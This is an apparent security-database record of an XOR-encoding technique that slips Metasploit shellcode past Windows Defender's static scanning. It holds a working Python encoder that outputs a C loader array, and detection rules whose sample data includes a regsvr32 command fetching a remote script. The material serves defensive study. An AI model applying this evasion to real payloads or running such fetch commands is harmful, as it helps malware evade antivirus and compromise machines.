Bypass Record

Obfuscation / Packing × Microsoft Windows Defender

A publicly-reported instance of Obfuscation / Packing bypassing Microsoft Windows Defender, recorded with its original source. Factual record; no assessment of any specific deployment.

Product
Microsoft Windows Defender
Technique
Obfuscation / Packing
MITRE ATT&CK
T1027
Confidence
High
Severity
High
Status
poc
Disclosed
2026-01-28
Config / version noted
Not stated

Provenance

Reported as

bypassed Defender's real-time protection and static scanning

Mechanism

Raw shellcode is exported from Metasploit, XOR-encrypted with a Python script, and embedded as a byte array in a custom C loader. At run time the loader XOR-decrypts the array in memory, allocates executable memory with VirtualAlloc, places the decrypted shellcode there, and transfers execution to it. Because the bytes on disk are the encoded blob rather than the shellcode itself, Windows Defender's signature-based and static scanning does not match them. The same report also notes the Metasploit Script Web Delivery module, which uses regsvr32.exe for fileless command execution.
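The encode-then-decode step is the whole bypass, so here it is in working form: an added example in Python, not code from the reported PoC or from Metasploit. The shellcode fragment, the keys and the "signature" bytes are constructed stand-ins (the fragment is a placeholder, not a working payload). Beyond the record above, the block also shows the caveat a defender cares about: a one-byte XOR key is recovered by trying all 256 values, while a longer repeating key pushes detection to the moment the loader decrypts the buffer in memory.

```python
"""XOR encoder and loader-side decoder for the mechanism recorded above.

Added example, not code from the reported PoC. The shellcode fragment, the
keys and the 'signature' are constructed stand-ins; the fragment is a
placeholder and not a working payload.
"""

# Constructed stand-in for raw shellcode bytes exported from Metasploit.
RAW_SHELLCODE = bytes.fromhex(
    "fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220"
)

# Constructed stand-in for a static byte signature written against the raw bytes.
SIGNATURE = bytes.fromhex("fc4883e4f0e8")

# Constructed keys: a single-byte key and a 16-byte repeating key.
KEY_SINGLE = b"\x35"
KEY_MULTI = bytes.fromhex("5a3c9e17d2b48fa61c7e03d5e9b27a44")


def xor_crypt(data: bytes, key: bytes) -> bytes:
    """XOR each byte with the repeating key.

    XOR is its own inverse, so this one routine is both the encoder (the
    Python script in the report) and the decoder (the loop the C loader
    runs over the embedded array before calling VirtualAlloc).
    """
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def to_c_array(data: bytes, name: str = "buf") -> str:
    """Render bytes as the C array literal a loader embeds in its source."""
    body = ", ".join(f"0x{b:02x}" for b in data)
    return (f"unsigned char {name}[] = {{ {body} }};\n"
            f"unsigned int {name}_len = {len(data)};")


def static_scan(blob: bytes, signature: bytes = SIGNATURE) -> bool:
    """Model of a static scanner: substring match on the bytes as stored."""
    return signature in blob


def recover_single_byte_key(blob: bytes, signature: bytes = SIGNATURE):
    """Model of a scanner that tries every single-byte XOR key.

    Returns the key byte if the signature reappears, else None. This is why
    a one-byte key gives far less cover than a longer one.
    """
    for k in range(256):
        if signature in xor_crypt(blob, bytes([k])):
            return k
    return None


def demo() -> dict:
    """Run the encode / scan / decode sequence and report what each stage saw."""
    enc_single = xor_crypt(RAW_SHELLCODE, KEY_SINGLE)
    enc_multi = xor_crypt(RAW_SHELLCODE, KEY_MULTI)
    return {
        "raw_matches": static_scan(RAW_SHELLCODE),
        "single_matches_on_disk": static_scan(enc_single),
        "single_key_recovered": recover_single_byte_key(enc_single),
        "multi_matches_on_disk": static_scan(enc_multi),
        "multi_key_recovered": recover_single_byte_key(enc_multi),
        # The loader's decrypt step restores the bytes; a scan of the decrypted
        # region in memory sees the signature again.
        "decrypted_matches": static_scan(xor_crypt(enc_multi, KEY_MULTI)),
        "roundtrip_ok": xor_crypt(enc_multi, KEY_MULTI) == RAW_SHELLCODE,
    }


if __name__ == "__main__":
    print(to_c_array(xor_crypt(RAW_SHELLCODE, KEY_MULTI), "enc"))
    for label, value in demo().items():
        print(f"{label}: {value}")
```

Running the block prints the C array a loader would embed and then the scan results: the signature matches the raw bytes, matches neither encoded blob on disk, is recovered by the 256-key trial for the single-byte case only, and reappears once the multi-byte blob is decrypted.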

Detection & mitigation

Monitor for processes that allocate executable memory (for example, VirtualAlloc with PAGE_EXECUTE_READWRITE) and then execute code from that region, especially when the same process goes on to spawn suspicious child processes or open network connections. Deploy endpoint detection rules that flag an in-process decryption routine followed by execution from newly allocated memory. Keep antivirus signatures current for known Metasploit shellcode, with the caveat that a signature for the raw bytes will not match the encoded blob on disk; it helps only where the scanner can undo a trivial (single-byte) XOR key or scan the decrypted buffer in memory at run time. Also monitor regsvr32.exe executions that fetch remote content, the fileless delivery path noted for the Script Web Delivery module.
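The first detection note above is a correlation rule, so here it is as one, as an added example and not from the cited source. It assumes an EDR or ETW feed that records memory allocations with their protection flags alongside process-creation and network events; Windows Defender's own event log does not expose VirtualAlloc calls, so the "alloc" records are an assumption about what such a sensor provides. All events, PIDs, image names, addresses and the regsvr32 command line are constructed.

```python
"""Correlation rules for the telemetry described above.

Added example, not from the cited source. It assumes a sensor that records
RWX memory allocations per process (an assumption; Defender's event log does
not expose VirtualAlloc). Every event below is constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Event:
    ts: float      # seconds since an arbitrary epoch
    pid: int
    image: str     # process image name
    kind: str      # "alloc" | "child" | "netconn" | "proc"
    detail: str    # protection flags, child image, remote endpoint, or command line


# Constructed sample telemetry. PID 4242 plays the loader from the record;
# PID 1337 is a JIT-heavy process that also maps RWX memory but does nothing
# else inside the window; PID 900 connects out without any RWX mapping.
SAMPLE_EVENTS: List[Event] = [
    Event(10.0, 1337, "browser.exe", "alloc", "PAGE_EXECUTE_READWRITE"),
    Event(12.0, 900, "updater.exe", "netconn", "203.0.113.7:443"),
    Event(20.0, 4242, "loader.exe", "alloc", "PAGE_EXECUTE_READWRITE"),
    Event(20.4, 4242, "loader.exe", "netconn", "198.51.100.9:4444"),
    Event(21.0, 4242, "loader.exe", "child", "cmd.exe"),
    Event(25.0, 2001, "regsvr32.exe", "proc",
          "regsvr32 /s /n /u /i:http://198.51.100.9:8080/x.sct scrobj.dll"),
    Event(80.0, 1337, "browser.exe", "netconn", "203.0.113.20:443"),
]

RWX_FLAGS = {"PAGE_EXECUTE_READWRITE"}
FOLLOWUP_KINDS = {"child", "netconn"}


def rwx_then_activity(events: List[Event], window: float = 30.0) -> List[dict]:
    """Flag a PID that maps RWX memory and then, within `window` seconds,
    spawns a child process or opens a network connection. One alert per PID."""
    by_pid = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        by_pid[e.pid].append(e)
    alerts = []
    for pid, evs in by_pid.items():
        for a in (e for e in evs if e.kind == "alloc" and e.detail in RWX_FLAGS):
            follow = [e for e in evs
                      if e.kind in FOLLOWUP_KINDS and a.ts <= e.ts <= a.ts + window]
            if follow:
                alerts.append({"pid": pid, "image": a.image, "alloc_ts": a.ts,
                               "followups": [(e.kind, e.detail) for e in follow]})
                break
    return alerts


def regsvr32_remote(events: List[Event]) -> List[Event]:
    """Flag regsvr32.exe started with a URL after /i:, the command-line shape
    Metasploit's Script Web Delivery regsvr32 target uses."""
    return [e for e in events
            if e.kind == "proc" and e.image.lower() == "regsvr32.exe"
            and "/i:http" in e.detail.lower()]


if __name__ == "__main__":
    for alert in rwx_then_activity(SAMPLE_EVENTS):
        print("RWX-then-activity:", alert)
    for hit in regsvr32_remote(SAMPLE_EVENTS):
        print("regsvr32 remote load:", hit.pid, hit.detail)
```

On the sample feed only the loader PID and the regsvr32 invocation fire. The browser process also maps RWX memory, as JIT engines do, but its next network connection falls outside the 30-second window; that window, plus an allow list for known JIT images, is where the rule is tuned against false positives.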


This is a record of a publicly-reported event, not an assessment of any specific organization's deployment. Detection and mitigation notes are drawn from the cited source. Where the source is silent, fields are omitted.